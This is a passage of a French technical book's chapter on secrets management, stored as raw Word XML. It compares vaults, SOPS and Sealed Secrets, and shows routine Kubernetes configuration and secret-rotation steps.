        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>82.2 Trois familles de solutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les outils diffèrent par l'endroit où le secret est lisible et par le moment où il est déchiffré. Le choix dépend de qui doit pouvoir le lire et quand.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.313 — Quatre familles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04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Famille</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Exemples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Secret lisible par</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coffre central</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vault, AWS Secrets Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Application, à l'exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Secret scellé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Sealed Secrets, SOPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Le contrôleur du cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secret chiffré dans Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SOPS + KMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ceux qui ont la clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Secret de CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Variables protégées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Le pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="95" name="Picture 95"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f93.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId133"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.93 — Deux stratégies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>82.3 SOPS et Sealed Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chiffrer un fichier de secrets dans Git rend la configuration complète et versionnée. Cela déplace le problème : la clé de déchiffrement devient le secret critique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un chiffrement par environnement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.sops.yaml — règles de chiffrement par chemin</w:t>
        <w:br/>
        <w:t>creation_rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - path_regex: environnements/production/.*\.yaml$</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kms: arn:aws:kms:eu-west-3:123456789012:key/abcd-1234</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - path_regex: environnements/recette/.*\.yaml$</w:t>
        <w:br/>
        <w:t xml:space="preserve">    age: age1ql3z7hjy54pw3hyww5ayyfg7zqgvc7w3j2elw8zmrj2kg5sfn9aqmcac8p</w:t>
        <w:br/>
        <w:br/>
        <w:t># Chiffrer puis vérifier</w:t>
        <w:br/>
        <w:t>sops --encrypt --in-place environnements/production/secrets.yaml</w:t>
        <w:br/>
        <w:t>sops --decrypt environnements/production/secrets.yaml | head -3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un secret scellé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Sealed Secrets — chiffrement asymétrique</w:t>
        <w:br/>
        <w:t>kubeseal --format yaml &lt; secret.yaml &gt; secret-scellé.yaml</w:t>
        <w:br/>
        <w:br/>
        <w:t># Le secret scellé est versionné sans risque</w:t>
        <w:br/>
        <w:t>apiVersion: bitnami.com/v1alpha1</w:t>
        <w:br/>
        <w:t>kind: SealedSecret</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: base</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  encryptedData:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    motdepasse: AgBy3i4OJSWK+PiTy...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.314 — Cinq critères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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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SOPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Sealed Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>N'importe quel YAML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Objets Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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KMS, age, PGP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Clé du contrôleur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Par renouvellement de clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Hors cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Complexité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyenne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CHIFFRER NE PROTÈGE PAS D'UN DÉPÔT PUBLIC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un fichier chiffré peut être publié sans risque immédiat, mais tout le monde peut tenter de le déchiffrer hors ligne. La clé doit être robuste et tournée régulièrement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>82.4 Consommer un secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un conteneur reçoit un secret par variable d'environnement ou par fichier monté. Le fichier est préférable pour les valeurs longues et pour la rotation sans redémarrage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux modes de montage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Variable d'environnement</w:t>
        <w:br/>
        <w:t>env:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: DATABASE_URL</w:t>
        <w:br/>
        <w:t xml:space="preserve">    valueFrom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      secretKeyRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name: base</w:t>
        <w:br/>
        <w:t xml:space="preserve">        key: url</w:t>
        <w:br/>
        <w:br/>
        <w:t># Fichier monté (rotation possible)</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">    secret:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      secretName: base</w:t>
        <w:br/>
        <w:t>volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">    mountPath: /run/secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">    readOnly: true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un secret synchronisé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Externe : synchronisation depuis un coffre</w:t>
        <w:br/>
        <w:t>apiVersion: external-secrets.io/v1</w:t>
        <w:br/>
        <w:t>kind: ExternalSecret</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: base</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  refreshInterval: 1h</w:t>
        <w:br/>
        <w:t xml:space="preserve">  secretStoreRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: vault</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kind: ClusterSecretStore</w:t>
        <w:br/>
        <w:t xml:space="preserve">  target:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: base</w:t>
        <w:br/>
        <w:t xml:space="preserve">  data:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - secretKey: motdepasse</w:t>
        <w:br/>
        <w:t xml:space="preserve">      remoteRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        key: production/base</w:t>
        <w:br/>
        <w:t xml:space="preserve">        property: motdepasse</w:t>
      </w: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UN SECRET MONTÉ N'EST PAS MIS À JOUR PARTOUT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un fichier monté est rafraîchi par le kubelet, mais l'application doit relire le fichier. Une variable d'environnement, elle, n'est jamais mise à jour : elle exige un redémarrage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>82.5 Rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Faire tourner un secret sans coupure exige que l'ancienne et la nouvelle valeur soient valides simultanément. Cette période de recouvrement se planifie.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Émettre la nouvelle valeur et l'accepter en plus de l'ancienne.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Déployer la nouvelle valeur auprès des consommateurs.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Vérifier que plus aucun consommateur n'utilise l'ancienne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Révoquer l'ancienne valeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Consigner la rotation et sa date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications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Vérifier l'âge des secrets (exemple Vault)</w:t>
        <w:br/>
        <w:t>vault kv metadata get secret/production/base | grep -E</w:t>
        <w:br/>
        <w:t xml:space="preserve">  'created_time|updated_time'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Renouveler un jeton de base (double validation)</w:t>
        <w:br/>
        <w:t># 1. ajouter le nouveau jeton</w:t>
        <w:br/>
        <w:t># 2. déployer</w:t>
        <w:br/>
        <w:t># 3. attendre la fin des sessions actives</w:t>
        <w:br/>
        <w:t># 4. supprimer l'ancien jeton</w:t>
        <w:br/>
        <w:t># 5. vérifier les erreurs d'authentification</w:t>
